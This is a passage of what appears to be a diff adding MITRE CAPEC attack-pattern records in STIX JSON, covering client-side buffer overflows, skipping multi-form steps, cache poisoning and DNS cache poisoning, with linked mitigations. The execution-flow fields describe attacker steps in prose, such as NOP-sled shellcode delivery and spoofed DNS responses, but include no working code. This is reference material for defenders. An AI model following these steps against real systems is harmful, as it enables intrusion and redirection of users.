"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6783fbbe-cb1a-4317-b126-e62c3d58ea7a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Prefer working without user input when using file system calls", + "id": "course-of-action--58beef38-a794-42dd-9869-09e4f46ad695", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa273050-3e5a-48ed-99c7-1995e7e3dddf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58beef38-a794-42dd-9869-09e4f46ad695", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": 
"3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7fa50c0f-70d2-46b9-9b96-8a6d35003ae2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--42bb8848-1460-40e7-8946-994f5692eb0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service. This hostile service is created to deliver the correct content to the client software. 
For example, if the client-side application is a browser, the service will host a webpage that the browser loads.", + "external_references": [ + { + "external_id": "CAPEC-14", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/14.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Client-side Injection-induced Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Authors often use tags in HTML documents. For example\n \n In Internet Explorer 4.0 an adversary attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target client-side application: The adversary identifies a target client-side application to perform the buffer overflow on. The most common are browsers. If there is a known browser vulnerability an adversary could target that.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    Many times client side applications will be open source, so an adversary can examine the source code to identify possible injection vectors.
    Examine APIs of the client-side application and look for areas where a buffer overflow might be possible.
  3. Create hostile service: The adversary creates a hostile service that will deliver content to the client-side application. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  4. Techniques
    If the client-side application is a browser, the adversary will create a service that delivers a malicious webpage to the browser.
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary delivers the content to the client-side application using the hostile service and overflows the buffer.

  2. Techniques
    If the adversary is targeting a local client-side application, they just need to use the service themselves.
    If the adversary is attempting to cause an overflow on an external user's client-side application, they must get the user to attach to their service by some other means. This could be getting a user to visit their hostile webpage to target a user's browser.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted client software communicates with an external server.", + "The targeted client software has a buffer overflow vulnerability." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap requires a more in-depth knowledge and higher skill level.", + "Low": "To achieve a denial of service, an attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The client software should not install untrusted code from a non-authenticated server.", + "id": "course-of-action--2761b390-a1a6-4680-a497-a6a2c25e93c9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a74ceb6-2d35-4bcc-9ead-f651fb717fec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2761b390-a1a6-4680-a497-a6a2c25e93c9", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The client software should have the latest patches and should 
be audited for vulnerabilities before being used to communicate with potentially hostile servers.", + "id": "course-of-action--ce9d6c88-9b3a-4753-8f7e-6bdc4ae98b79", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ffe9eb1-760d-4e9e-9075-29f67befc8f5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ce9d6c88-9b3a-4753-8f7e-6bdc4ae98b79", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for length of buffer inputs.", + "id": "course-of-action--4a5d5c42-670e-4977-9e5e-fec5b0d2fca3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--93d45ad5-fae3-4178-8d28-ccd3ff20216c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a5d5c42-670e-4977-9e5e-fec5b0d2fca3", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1bb78a3-4a93-4fbe-815f-5cca85a0c491", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use an abstraction library to abstract away risky APIs. Not a complete solution.", + "id": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffb905de-a976-4ece-aa2c-96b818a64df0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f20aff5-3638-4761-91c5-af43ae273927", + "modified": 
"2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all buffer uses are consistently bounds-checked.", + "id": "course-of-action--e5a5e968-cd66-49b5-bbb8-b26099ede481", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4914cfc7-c995-469b-984b-72e07bf331e0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5a5e968-cd66-49b5-bbb8-b26099ede481", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--acdc688e-fa9d-48da-94ba-90902d7ac10d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "spec_version": "2.1", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application.", + "external_references": [ + { + "external_id": "CAPEC-140", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/140.html" + }, + { + "external_id": "CWE-372", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/372.html" + } + ], + "id": "attack-pattern--750dc5a2-e3c4-42d7-ad8a-25a7d1116f03", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Bypassing of Intermediate Forms in Multiple-Form Sets", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target must collect information from the user in a series of forms where each form has its own URL that the attacker can anticipate and the application must fail to detect attempts to access intermediate forms without first filling out the previous forms." 
+ ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.", + "external_references": [ + { + "external_id": "CAPEC-141", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/141.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "description": "Adversary-in-the-Middle: ARP Cache Poisoning", + "external_id": "T1557.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557/002" + }, + { + "description": "Cache Poisoning", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cache_Poisoning" + }, + { + "description": "Wikipedia, The 
Wikimedia Foundation, Inc", + "external_id": "REF-22", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/DNS_cache_poisoning" + }, + { + "description": "DNS Threats and DNS Weaknesses, DNSSEC", + "external_id": "REF-23", + "source_name": "reference_from_CAPEC", + "url": "http://www.dnssec.net/dns-threats.php" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-24", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/ARP_spoofing" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-599", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.html" + } + ], + "id": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cache Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.\n Local DNS usually caches IP addresses and do not go to remote DNS every time. 
Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com\n When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify and explore caches: Use tools to sniff traffic and scan a network in order to locate application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache) that may have vulnerabilities. Look for poisoning point in cache table entries.

  2. Techniques
    Run tools that check available entries in the cache.

Experiment

  1. Cause specific data to be cached: An attacker sends bogus request to the target, and then floods responses that trick a cache to remember malicious responses, which are wrong answers of queries.

  2. Techniques
    Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).

Exploit

  1. Redirect users to malicious website: As the attacker succeeds in exploiting the vulnerability, they are able to manipulate and interpose malicious response data to targeted victim queries.

  2. Techniques
    Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).
    Adversary-in-the-Middle attacks (CAPEC-94) intercept secure communication between two parties.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc" + ], + "x_capec_prerequisites": [ + "The attacker must be able to modify the value stored in a cache to match a desired value.", + "The targeted application must not be able to detect the illicit modification of the cache and must trust the cache value in its calculations." + ], + "x_capec_skills_required": { + "Medium": "To overwrite/modify targeted cache" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable client side caching.", + "id": "course-of-action--b3bb35f0-3493-4d4b-bdb9-7d820a64f6e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-141-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--deba223b-a821-4baf-b653-5358be0f03c4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3bb35f0-3493-4d4b-bdb9-7d820a64f6e7", + "spec_version": "2.1", + "target_ref": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes.", + "id": "course-of-action--f60e0fe1-d821-4df9-817e-4d2a91308464", + "modified": 
"2022-09-29T00:00:00.000Z", + "name": "coa-141-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f3dd06d-6976-4324-8d3c-1523b5d6f23a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f60e0fe1-d821-4df9-817e-4d2a91308464", + "spec_version": "2.1", + "target_ref": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. 
Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.", + "external_references": [ + { + "external_id": "CAPEC-142", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/142.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + }, + { + "description": "Compromise Infrastructure: DNS Server", + "external_id": "T1584.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1584/002" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-22", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/DNS_cache_poisoning" + }, + { + "description": "DNS Threats and DNS Weaknesses, DNSSEC", + "external_id": "REF-23", + "source_name": "reference_from_CAPEC", + "url": "http://www.dnssec.net/dns-threats.php" + }, + { + "description": "Vulnerability Note VU#800113, 2008--07---08, US CERT", + "external_id": "REF-27", + "source_name": "reference_from_CAPEC", + "url": "http://www.kb.cert.org/vuls/id/800113#pat" + } + ], + "id": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DNS Cache Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + 
"x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, an adversary sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.\n Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the adversary floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com\n When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore resolver caches: Check DNS caches on local DNS server and client's browser with DNS cache enabled.

  2. Techniques
    Run tools that check the resolver cache in the memory to see if it contains a target DNS entry.
    Figure out if the client's browser has DNS cache enabled.

Experiment

  1. Attempt sending crafted records to DNS cache: A request is sent to the authoritative server for target website and wait for the iterative name resolver. An adversary sends bogus request to the DNS local server, and then floods responses that trick a DNS cache to remember malicious responses, which are wrong answers of DNS query.

  2. Techniques
    Adversary must know the transaction ID by intercepting a DNS query, or sending a bogus query with known transaction ID.
    If the transaction ID used to identify each query instance is randomized in some new DNS software, the attack must guess the transaction ID. Slow the response of the real DNS server by causing Denial-of-service. This gives adversaries enough time to guess transaction
    Adversary crafts DNS response with the same transaction ID as in the request. The adversary sends out DNS responses before the authorized DNS server. This forces DNS local cache stores fake DNS response (wrong answer). The fake DNS responses usually include a malicious website's IP address.

Exploit

  1. Redirect users to malicious website: As the adversary succeeds in exploiting the vulnerability, the victim connects to a malicious site using a good web site's domain name.

  2. Techniques
    Redirecting Web traffic to a site that looks enough like the original so as to not raise any suspicion.
    Adversary-in-the-Middle (CAPEC-94) intercepts secure communication between two parties.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A DNS cache must be vulnerable to some attack that allows the adversary to replace addresses in its lookup table.Client applications must trust the corrupted cashed values and utilize them for their domain name resolutions." + ], + "x_capec_resources_required": [ + "The adversary must have the resources to modify the targeted cache. In addition, in most cases the adversary will wish to host the sites to which users will be redirected, although in some cases redirecting to a third party site will accomplish the adversary's goals." + ], + "x_capec_skills_required": { + "Medium": "To overwrite/modify targeted DNS cache" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Make sure your DNS servers have been updated to the latest versions", + "id": "course-of-action--1643a615-4b7c-4a23-a477-7d01dbf9fe9d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-0", + "object_marking_refs": [ + 